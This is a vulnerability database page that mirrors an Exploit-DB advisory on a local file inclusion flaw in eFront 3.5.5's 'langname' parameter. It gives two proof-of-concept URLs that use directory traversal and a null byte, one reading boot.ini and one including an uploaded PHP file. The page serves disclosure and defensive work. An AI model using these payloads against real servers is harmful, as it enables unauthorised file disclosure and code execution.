Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdb7SafeEDB-ID:33769
HistoryMar 17, 2010 - 12:00 a.m.

eFront 3.5.5 - 'langname' Local File Inclusion

2010-03-1700:00:00
7Safe
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/38787/info

eFront is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

eFront 3.5.5 and prior are vulnerable. 

http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=a/../../../../../../boot.ini%00
http://www.example.com/efront/www/editor/tiny_mce/langs/language.php?langname=../../../../upload/student/message_attachments/Sent/1266862529/malicious.php.inc%00

Related

nvd 1
nessus 1
prion 1
openvas 1
cve 1
cvelist 1
dsquare 1
nvd
nvd
CVE-2010-1003
2010-03-19 20:30:00
nessus
nessus
eFront 'langname' Parameter Traversal Local File Inclusion
2010-03-22 00:00:00
prion
prion
Directory traversal
2010-03-19 20:30:00
openvas
openvas
eFront 'langname' Parameter Local File Include Vulnerability
2010-03-22 00:00:00
cve
cve
CVE-2010-1003
2010-03-19 20:30:00
cvelist
cvelist
CVE-2010-1003
2010-03-19 20:00:00
dsquare
dsquare
eFront 3.5.5 LFI
2012-05-01 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:33769
nvd1nessus1prion1openvas1cve1cvelist1dsquare1